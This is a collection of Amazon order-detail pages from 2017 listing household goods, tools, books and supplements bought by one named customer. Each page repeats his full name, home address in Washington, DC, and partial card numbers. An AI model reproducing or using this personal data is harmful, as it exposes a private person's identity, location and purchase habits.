1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #113-9454467-3017066 Order Placed: November 10, 2017 Amazon.com order number: 113-9454467-3017066 Order Total: $19.99 Shipped on November 10, 2017 Items Ordered Price 1 of: 2PK 16.4OZ Prop Bottle (Pack of 2) Sold by: ORELKO (seller profile) $19.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $19.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $19.99 BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$19.99 United States Credit Card transactions AmazonPLCC ending in 3157: November 10, 2017:$19.99 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-0558522-1680267 Order Placed: October 19, 2017 Amazon.com order number: 111-0558522-1680267 Order Total: $14.69 Shipped on October 20, 2017 Items Ordered 1 of: Finish Dishwasher Water Softener Salt For Bosch Dishwasher 2-Pack 8.8 Lbs Sold by: Certified EShop (seller profile) Price $14.69 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $14.69 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $14.69 BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$14.69 United States Credit Card transactions AmazonPLCC ending in 3157: October 20, 2017:$14.69 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-6103955-9227403 Order Placed: October 14, 2017 Amazon.com order number: 111-6103955-9227403 Order Total: $76.48 Shipped on October 14, 2017 Items Ordered Price 1 of: BABYMOP -Your Baby Helps Cleaning the House. Great Combo: Cleaning Mop + Rompers = BABYMOP Sold by: Baby Mop (seller profile) $38.95 Condition: New 1 of: RoadPro 12-Volt Portable Stove, Black Sold by: Amazon.com Services LLC $35.49 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $74.44 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $74.44BRIAN J COADY Estimated tax to be collected: $2.041454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$76.48 United States Credit Card transactions AmazonPLCC ending in 3157: October 14, 2017:$76.48 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-1025251-6565838 Order Placed: September 30, 2017 Amazon.com order number: 111-1025251-6565838 Order Total: $549.99 Shipped on October 2, 2017 Items Ordered Price 1 of: Prolux CV12000 Central Vacuum Unit System with Electric Hose Power Nozzle $549.99 Kit and 25 Year Warranty Sold by: Great-Vacs (seller profile) Condition: New In stock and ready to ship. GreatVacs is the only Amazon authorized retailer so you are protected by the factory warranty! Email with any questions. Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $549.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $549.99BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$549.99 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-9233022-5829058 Order Placed: September 24, 2017 Amazon.com order number: 111-9233022-5829058 Order Total: $12.99 Shipped on September 25, 2017 Items Ordered Price 1 of: ALPHELIGANCE Cast Iron Cleaner-Stainless Steel Chainmail Scrubber for Pre Seasoned Skillet Pan,New Kitchen Tool for Washing Cookware (8" × 8“) Sold by: TOAO (seller profile) $12.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $12.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $12.99BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$12.99 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-8946803-1812226 Order Placed: August 11, 2017 Amazon.com order number: 111-8946803-1812226 Order Total: $136.34 Shipped on August 11, 2017 Items Ordered 2 of: Collectors Hold Museum Putty Sold by: Amazon.com Services LLC Price $4.99 Condition: New 1 of: M-D Building Products 2311 High Density Foam Tape, 1/2-by-3/4-Inch by 10 feet, Gray, M-D BUILDING PRODUCTS Sold by: Amazon.com Services LLC $3.49 Condition: New 1 of: iRobot Roomba Integrated Dock Charger with North American Line Cord Sold by: Amazon.com Services LLC $54.99 Condition: New Print this page for your records. Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on August 12, 2017 Items Ordered Price 1 of: Hurricane Pro High Velocity Metal Floor Fan 20 inch -736476 -Heavy Duty Floor $60.46 Fan for Industrial, Commercial and Greenhouse Use Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Grand Total:$136.34 Payment information Payment Method: Visa | Last digits: 4452 Item(s) Subtotal: $128.92 Shipping & Handling: $0.00 Billing address BRIAN J COADY 1454 MONROE ST NW Total before tax: $128.92 Estimated tax to be collected: $7.42 WASHINGTON, DC 20010 United States Credit Card transactions Visa ending in 4452: August 12, 2017:$63.94 Visa ending in 4452: August 11, 2017:$72.40 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-0243963-6527426 Order Placed: July 21, 2017 Amazon.com order number: 111-0243963-6527426 Order Total: $11.59 Shipped on July 22, 2017 Items Ordered Price 1 of: Duck Brand 284423 Window Air Conditioner Insulating Strip Seal, 2.25-Inch x 2.25-Inch x 42-Inch Sold by: Amazon.com Services LLC $10.96 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $10.96 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $10.96BRIAN J COADY Estimated tax to be collected: $0.631454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$11.59 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-0895234-6018635 Order Placed: July 12, 2017 Amazon.com order number: 113-0895234-6018635 Order Total: $15.70 Shipped on July 13, 2017 Items Ordered Price 1 of: Springstar S1524 Jumbo Clothes Moth Trap Sold by: Boon Sales (seller profile) $15.70 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $15.70 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $15.70 BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$15.70 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-8897185-8605059 Order Placed: July 11, 2017 Amazon.com order number: 113-8897185-8605059 Order Total: $9.99 Shipped on July 13, 2017 Items Ordered Price 1 of: Spork 1 Unit, Titanium Spork (Spoon Fork) With Bottle Opener Extra Strong Ultra $9.99 Lightweight (Ti), Healthy & Eco-Friendly Spoon, Fork & Bottle Opener for Travel / Camping in Easy to Store Cloth Case Sold by: finessCity (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $9.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $9.99 BRIAN J COADY Estimated tax to be collected: $0.00 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$9.99 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-6519033-9945062 Order Placed: July 11, 2017 Amazon.com order number: 113-6519033-9945062 Order Total: $14.39 Shipped on July 13, 2017 Items Ordered Price 1 of: BangTi Titanium Punisher Pry Bar EDC Hand Multi Tool Sold by: BANG TI Titanium (seller profile) $17.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $17.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Promotion applied: -$3.60 Billing address BRIAN J COADY Total before tax: $14.391454 MONROE ST NW Estimated tax to be collected: $0.00WASHINGTON, DC 20010 United States Grand Total:$14.39 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-7252304-7487456 Order Placed: July 11, 2017 Amazon.com order number: 113-7252304-7487456 Order Total: $38.22 Shipped on July 13, 2017 Items Ordered Price 3 of: BANG TI Titanium Mini Custom Quick Release Hook KeyChain -45mm -Grey Sold by: BANG TI Titanium (seller profile) $14.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $44.97 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Promotion applied: -$6.75 Billing address BRIAN J COADY Total before tax: $38.221454 MONROE ST NW Estimated tax to be collected: $0.00WASHINGTON, DC 20010 United States Grand Total:$38.22 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-6411053-7226618 Order Placed: July 11, 2017 Amazon.com order number: 113-6411053-7226618 Order Total: $31.12 Shipped on July 13, 2017 Items Ordered Price 1 of: Truper 31202 Tru Pro Garden Spade, Fiberglass D-Handle, 29-Inch Sold by: Amazon.com Services LLC $29.43 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $29.43 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $29.43 BRIAN J COADY Estimated tax to be collected: $1.691454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$31.12 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-4928723-9202645 Order Placed: July 11, 2017 Amazon.com order number: 113-4928723-9202645 Order Total: $10.64 Shipped on July 13, 2017 Items Ordered Price 1 of: The Drama of the Gifted Child: The Search for the True Self, Revised Edition, Miller, Alice Sold by: Amazon.com Services LLC $10.06 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $10.06 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $10.06BRIAN J COADY Estimated tax to be collected: $0.581454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$10.64 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-4216060-0327411 Order Placed: July 11, 2017 Amazon.com order number: 113-4216060-0327411 Order Total: $119.99 Shipped on July 13, 2017 Items Ordered Price 1 of: USB Type C Cable, Snowkids USB C to USB A 3.0 (2-PACK 6.6ft) Nylon Braided Fast Charging Sync Cable for Google Pixel, LG G6 V20 G5, Nintendo Switch, Samsung Galaxy S8 Plus, New Macbook More (Grey) Sold by: Teada (seller profile) $13.99 Condition: New 1 of: Holy Stone HS200 FPV RC Drone with HD Wifi Camera Live Feed 2.4GHz 4CH 6Axis Gyro Quadcopter with Altitude Hold, Gravity Sensor and Headless Mode RTF Helicopter, Color Red Sold by: Holy Stone (seller profile) $89.99 Condition: New 1 of: Digestive Enzymes Plus Prebiotics & Probiotics -Natural Gluten Free Support For Better Digestion & Lactose Absorption -For Bloating & Gas Relief + Helps IBS & Leaky Gut -180 Vegan Capsules Sold by: Zesty Paws® (seller profile) $21.97 Condition: New 1 of: TheraBreath Dentist Formulated Dry Mouth Lozenges, Sugar Free, Mandarin Mint $7.97 Flavor, 100 Count Sold by: Amazon.com Services LLC Condition: New 1 of: Turmeric Curcumin with Bioperine Joint Pain Relief -Anti-Inflammatory, $19.87 Antioxidant & Anti-Aging Supplement with 10mg of Black Pepper for Better Absorption. Best 100% All Natural Non-Gmo Made in USA Sold by: Vimerson Health (seller profile) | Product question? Ask Seller Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Amazon.com Store Card | Last digits: 3157 Billing address BRIAN J COADY 1454 MONROE ST NW WASHINGTON, DC 20010 United States Item(s) Subtotal: $153.79 Shipping & Handling: $0.00 Lightning Deal: -$2.00 Lightning Deal: -$6.27 Lightning Deal: -$3.00 Promotion applied: -$18.00 Lightning Deal: -$4.87 Total before tax: $119.65 Estimated tax to be collected: $0.34 Grand Total:$119.99 Final Details for Order #112-1589809-4757031 Subscribe and Save Order Placed: June 24, 2017 Amazon.com order number: 112-1589809-4757031 Order Total: $17.08 This order contains Subscribe & Save items. Shipped on July 5, 2017 Items Ordered Price 1 of: The Laundress Ironing Water, Classic, 16 ounce Sold by: Amazon.com Services LLC $17.00 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $17.00 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$0.85 Billing address Total before tax: $16.15BRIAN J COADY Estimated tax to be collected: $0.931454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$17.08 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-4103762-6309826 Order Placed: June 18, 2017 Amazon.com order number: 113-4103762-6309826 Order Total: $27.40 Shipped on June 20, 2017 Items Ordered Price 1 of: Willow Nook Machine Needle Felting Wool Images, Hoffmann, Isabella Sold by: Amazon.com Services LLC $25.91 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $25.91 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $25.91 BRIAN J COADY Estimated tax to be collected: $1.491454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$27.40 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-8923116-4765836 Order Placed: June 18, 2017 Amazon.com order number: 113-8923116-4765836 Order Total: $192.27 Shipped on June 19, 2017 Items Ordered Price 1 of: DecoBREEZE Rhythm 16-Inch Pedestal Fan 3-Speed Oscillating Stand Fan $181.82 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Grand Total:$192.27 Payment Method: Amazon.com Store Card | Last digits: 3157 Item(s) Subtotal: $181.82 Shipping & Handling: $0.00 Billing address BRIAN J COADY 1454 MONROE ST NW Total before tax: $181.82 Estimated tax to be collected: $10.45 WASHINGTON, DC 20010 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-4276897-8225002 Order Placed: June 18, 2017 Amazon.com order number: 113-4276897-8225002 Order Total: $102.99 Shipped on June 19, 2017 Items Ordered Price 1 of: Hurricane Pro High Velocity Oscillating Metal Stand Fan 20 inch -736472 -$102.99 Heavy Duty Stand Fan for Industrial, Commercial and Greenhouse Use Sold by: Oceanside Hydroponics LLC (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Economy Shipping Payment information Payment Method: Item(s) Subtotal: $102.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $102.99BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$102.99 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-8121009-6703449 Order Placed: June 18, 2017 Amazon.com order number: 113-8121009-6703449 Order Total: $64.35 Shipped on June 18, 2017 Items Ordered 1 of: Peeps Eyeglass Cleaner -Lens Cleaner for Eyeglasses and Sunglasses -Glasses Cleaner for All Types of Eye Wear Sold by: Bold Home Products (seller profile) Price $19.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on June 19, 2017 Items Ordered 1 of: Pest No More GP401 Flour Pantry Moth Trap (2 Traps Per Pack) Sold by: Amazon.com Services LLC Price $13.40 Condition: New 1 of: Dr. Killigan's Premium Pantry Moth Traps With Pheromone Attractant | Safe, Non-Toxic with No Insecticides (6, Black Traps) Sold by: Dr. Killigan's (seller profile) $14.97 Condition: New 1 of: Household Essentials 35704-1 CedarFresh Clothes Protector and Moth Repellent Storage Accessories Value Pack (71 Items) Sold by: Amazon.com Services LLC $14.39 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Print this page for your records. Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $62.75 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $62.75BRIAN J COADY Estimated tax to be collected: $1.601454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$64.35 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-6417654-1749847 Order Placed: June 18, 2017 Amazon.com order number: 113-6417654-1749847 Order Total: $15.98 Shipped on June 18, 2017 Items Ordered Price 1 of: CableCreation Short USB Type C (USB-C) to USB 2.0 Micro USB Male Cable, USBC for Apple The Macbook, Chromebook Pixel and More, 0.2 Meter / Black Sold by: CableCreation (seller profile) | Product question? Ask Seller $7.99 Condition: New 1 of: ICZI USB C to Micro USB Female Adapter ( 1pcs ) + USB C to USB 3.0 Adapter ( 1pcs ), Aluminum Body, for Samsung Galaxy S8/S8 Plus,Nintendo Switch,Macbook, Chromebook Pixel and More (Space Gray) Sold by: ICZI-US (seller profile) $7.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $15.98 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $15.98 BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$15.98 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-2071340-8865015 Order Placed: May 25, 2017 Amazon.com order number: 114-2071340-8865015 Order Total: $16.37 Shipped on May 25, 2017 Items Ordered Price 1 of: The Complete Photo Guide to Felting, Lane, Ruth Sold by: Amazon.com Services LLC $15.48 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $15.48 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $15.48 BRIAN J COADY Estimated tax to be collected: $0.891454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$16.37 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-1557650-9357037 Order Placed: May 21, 2017 Amazon.com order number: 114-1557650-9357037 Order Total: $9.95 Shipped on May 21, 2017 Items Ordered Price 1 of: Wake Up To Your Life: Discovering the Buddhist Path of Attention, McLeod, Ken $9.95 Sold by: Catalina Designer Goods, LLC (seller profile) Condition: Used -Very Good Very good condition. Minor wear to corner/edges. Solid book. Satisfaction guaranteed. Clean pages, no markings. Solid spine. Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $9.95 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $9.95 BRIAN J COADY Estimated tax to be collected: $0.00 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$9.95 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-9326747-3685841 Order Placed: May 19, 2017 Amazon.com order number: 114-9326747-3685841 Order Total: $16.90 Shipped on May 20, 2017 Items Ordered Price 2 of: Window Elements Diamond Sheer Voile Extra Wide 56 x 84 in. Rod Pocket Curtain $3.45 Panel, Lime Sold by: Decotex Luxury Discounts (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $6.90 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $10.00 Billing address Total before tax: $16.90BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$16.90 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-8700564-4201862 Order Placed: May 19, 2017 Amazon.com order number: 114-8700564-4201862 Order Total: $26.68 Shipped on May 19, 2017 Items Ordered Price 1 of: Irwin Vise Grip Original Locking C-Clamp with Swivel Pads (2” 50mm Clamping Gap) Sold by: Amazon.com Services LLC $8.73 Condition: New 1 of: hilmor 1891146 SMTFT12 Folding Tool, 12" Sold by: Amazon.com Services LLC $16.50 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $25.23 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $25.23BRIAN J COADY Estimated tax to be collected: $1.451454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$26.68 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-8488424-4573023 Order Placed: May 19, 2017 Amazon.com order number: 114-8488424-4573023 Order Total: $76.58 Shipped on May 19, 2017 Items Ordered Price 1 of: Ball Pein Jeweler's Hammer 4 Ounces 8-3/4"Sold by: Amazon.com Services LLC $3.36 Condition: New 1 of: IRWIN VISE-GRIP Locking Multi-Pliers with Wire Cutter, 5", 1923454 Sold by: Amazon.com Services LLC $9.97 Condition: New 1 of: IRWIN Tools VISE-GRIP Locking Pliers, Original, Long Nose, 6-Inch (1402L3) Sold by: Amazon.com Services LLC $11.47 Condition: New 1 of: IRWIN VISE-GRIP Original Locking Sheet Metal Tool, 8", 23 Sold by: Amazon.com Services LLC $14.79 Condition: New 1 of: IRWIN Tools VISE-GRIP 6-Inch Locking C-Clamp Sold by: Amazon.com Services LLC $8.61 Condition: New 1 of: Midwest Tool and Cutlery MWT-6510L Midwest Snips Forged Blade Offset Left Cut $24.22 Aviation Snips Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: One-Day Shipping Payment information Payment Method: Item(s) Subtotal: $72.42 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $25.94 Free Shipping:-$25.94 Billing address BRIAN J COADY Total before tax: $72.42 1454 MONROE ST NW Estimated tax to be collected: $4.16 WASHINGTON, DC 20010 ---- United States Grand Total: $76.58 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #114-3403957-3819450 Order Placed: May 19, 2017 Amazon.com order number: 114-3403957-3819450 Order Total: $23.92 Shipped on May 19, 2017 Items Ordered Price 2 of: Window Elements Diamond Sheer Voile Extra Wide 56 x 84 in. Rod Pocket Curtain $5.00 Panel, Beige Sold by: onestopshop214 (seller profile) Condition: New 2 of: No. 918 Emily 59 by 84-Inch Sheer Voile Curtain Panel, Sage $3.96 Sold by: onestopshop214 (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $17.92 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $6.00 Billing address Total before tax: $23.92BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$23.92 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #112-6024984-4030627 Order Placed: May 10, 2017 Amazon.com order number: 112-6024984-4030627 Order Total: $68.22 Shipped on May 10, 2017 Items Ordered Price 1 of: Roomba Integrated Home Base Charger 500, 600, 700, 800, 900 Series 220v 240v 4415878 870 880 861 980 Sold by: vacs1 (seller profile) $68.22 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $68.22 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $68.22BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$68.22 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #112-7380104-2777851 Order Placed: May 10, 2017 Amazon.com order number: 112-7380104-2777851 Order Total: $20.94 Shipped on May 10, 2017 Items Ordered Price 1 of: SHP-ZONE Tangle-Free Debris Extractor Set & Side Brushes & Hepa Filters replacement Kit For iRobot Roomba 800 series 870 880 Sold by: ANBOO Direct (seller profile) $20.94 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $20.94 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $20.94BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$20.94 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-7622307-2985825 Order Placed: May 3, 2017 Amazon.com order number: 114-7622307-2985825 Order Total: $23.99 Shipped on May 4, 2017 Items Ordered Price 1 of: Powerextra 3.5Ah Ni-MH Battery for iRobot Roomba R3 500,600,700&800 900 $23.99 Series 500 510 530 531 532 535 536 540 550 552 560 562 570 580 595 600 620 630 650 660 700 760 770 780 790 800 870 880 900 980 Sold by: Powerextra (seller profile) Condition: New Powerextra Authorized Dealer,30 Days Money Back or Free Exchange and Satisfied Customer Support from Powerextra! Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $23.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $23.99 BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$23.99 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-8911096-9170653 Order Placed: April 30, 2017 Amazon.com order number: 114-8911096-9170653 Order Total: $38.59 Shipped on May 1, 2017 Items Ordered 1 of: Swash 80240512 Pods Awaken Cups (12 Pack), Orange Sold by: Amazon.com Services LLC Price $8.99 Condition: New 1 of: Universal Regular Point Overlock Needles-5/Pkg Sold by: Amazon.com Services LLC $6.29 Condition: New 1 of: Nature's Gift 99.9% Pure DMSO Liquid, Plastic, 8 Fluid Ounce Sold by: VerSure (seller profile) $14.95 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on April 30, 2017 Items Ordered 1 of: Janome Red Tip 5 Needle Pack Size 14 Sold by: JM Edge (seller profile) Price $7.48 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Print this page for your records. Payment information Payment Method: Amazon.com Store Card | Last digits: 3157 Item(s) Subtotal: $37.71 Shipping & Handling: $0.00 ---- Billing address BRIAN J COADY 1454 MONROE ST NW Total before tax: $37.71 Estimated tax to be collected: $0.88 ---- WASHINGTON, DC 20010 Grand Total:$38.59 